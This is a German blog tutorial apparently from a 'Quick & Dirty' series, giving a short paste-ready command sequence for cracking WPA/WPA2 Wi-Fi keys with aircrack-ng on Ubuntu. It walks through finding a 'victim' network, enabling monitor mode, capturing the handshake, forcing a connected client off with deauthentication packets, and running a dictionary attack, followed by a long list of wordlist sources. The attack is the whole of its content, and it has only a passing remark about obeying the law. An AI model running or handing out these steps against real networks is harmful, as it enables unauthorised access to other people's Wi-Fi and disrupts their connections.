Tutorial: Schnell und einfach WPA1 & WPA2 Wlan cracken (aircrack-ng & Ubuntu)

WiFi

WiFi

Diesmal aus der Quick&Dirty Tutorial Serie: Schnell und einfach WPA1/WPA2 “hacken”. Ein Tutorial  zum ausdrucken und überall mitnehmen. Dieser Hackguide ist kurz, umfassend und sehr effizient! Ich empfehle allerdings für Anfänger mein ausführlicheres Aircrack-ng WPA und WPA2 Crack Tutorial. Diese Version ist wirklich für portable Zwecke gedacht und ggf. zum direkten einfügen der Befehle in das Terminal von Ubuntu Linux. Diese Anleitung funktioniert allerdings nur mit einem angemeldeten Clienten im Wlan. (>>Hier gehts zur WEP Version)

Mein System:

Ubuntu 8.10 x86 32Bit mit Intel WiFi Link 5100 (Centrino2) Wlan Adapter
Aircrack-ng 32Bit Version
Wlan Adapter Name “wlan0″ bzw. “mon0″
BSSID des Opfer Wlans : 7E:40:80:00:14:6C
ESSID des Wlands: “testwlan” WPA2-PSK verschlüsselt
Wlan MAC des Clienten: AA:0F:B5:B2:BC:82
Meine “Wlan0″ Adapter Mac Adresse: 00:0F:AC:82:AC:82

Alle Befehle bitte als root ausführen! Sprich vor jedem Befehl ein “sudo” dransetzen oder gleich von Anfang an “sudo -s” eingeben und alle weiteren “sudo” Befehle vernachlässigen. Alle Befehle sind in einer Zeile geschrieben bitte lasst euch nicht vom Zeilenumbruch hier auf dieser Website irritieren!


0. Opfer Wlan suchen mit “airodump-ng”

sudo airodump-ng wlan0

1. Karte in Monitor Mode mit “airmon-ng” (z.B. Channel 6 für Opfer Wlan)

sudo airmon-ng start wlan0 6

Jetzt nur noch mon0 als Adapter Alias Namen für die Befehle verwenden!

1.1 Karte in Monitor Mode mit iwconfig und ifconfig (mit z.B. Channel 6 für Opfer Wlan)

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo iwconfig wlan0 channel 6
sudo ifconfig wlan0 up

Jetzt einfach wlan0 weiter als Adapter Alias Namen verwenden bei den Befehlen!

2. Datenpakete bzw. Handshakes Sammeln mit “airodump-ng”

sudo airodump-ng -c 6 -w output --bssid 7E:40:80:00:14:6C wlan0

3. Es werden 8 DeAuth Pakete versenden mit “aireplay-ng”

sudo aireplay-ng -0 8 -a 7E:40:80:00:14:6C -c AA:0F:B5:B2:BC:82 wlan0

Sobald der Handshake aufgezeichnet wurde, benutzen wir direkt “aircrack-ng” um das Passwort herauszufinden.

4. Key aus dem Handshake cracken mit “aircrack-ng”

sudo aircrack-ng -a 2 -b 7E:40:80:00:14:6C -e testwlan -w <wordlist> *.cap

Fertig!

mit “-w <wordlist>” gebt ihr den Pfad zu eurer Wordlist/Rainbowtable an. Falls das Passwort zu komplex ist, sprich eine belibige Kombination von Buchstaben und Zahlen, könnt ihr es gleich vergessen. Wobei es inzwischen die “Möglichkeit” gibt mittels CUDA und Pyrit eine Bruteforce Attacke in sehr hoher Geschwindigkeit durchlaufen zu lassen. Zufallsgeneration von Kombinationen sind z.B. mit John TR Outputs möglich. Inzwischen ist es sogar möglich, ganz Wikipedia als Wordlist zu nutzen.

Wordlisten Links findet ihr hier:

  • ftp://ftp.openwall.com/pub/wordlists/
  • http://www.openwall.com/mirrors/
  • ftp://ftp.ox.ac.uk/pub/wordlists/
  • http://gdataonline.com/downloads/GDict/
  • http://www.theargon.com/achilles/wordlists/
  • http://theargon.com/achilles/wordlists/theargonlists/
  • ftp://ftp.cerias.purdue.edu/pub/dict/
  • http://www.outpost9.com/files/WordLists.html
  • http://www.securinfos.info/wordlists_dictionnaires.php
  • http://www.vulnerabilityassessment.co.uk/passwords.htm
  • http://packetstormsecurity.org/Crackers/wordlists/
  • http://www.ai.uga.edu/ftplib/natural-language/moby/
  • http://www.insidepro.com/eng/download.shtml
  • http://www.word-list.com/
  • http://www.cotse.com/tools/wordlists1.htm
  • http://www.cotse.com/tools/wordlists2.htm
  • http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
  • http://wordlist.sourceforge.net/

Oder bastelt euch eure eigene Wordlist mit:

  • https://code.goto10.org/svn/unpacked/sh/etemenanki/etemenanki.sh
  • http://awlg.org/index.gen
  • http://forum.aircrack-ng.org/index.php?topic=4580.0
  • http://forum.aircrack-ng.org/index.php?topic=4877.msg27435#msg27435

Jedenfalls wünsche ich viel Spaß und beachtet die geltenden Gesetze - Euer SuperKato Team!

Zur Diskussion im Forum: Hier Klicken!

Download: Die Anleitung zum Ausdrucken als PDF Version (DIN A4 Format):

  SuperKato Tutorial: Quick & Dirty WPA WPA2 Cracking (73,9 KiB, 173 hits)

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 5,00 out of 5)
Loading ... Loading ...

Kommentieren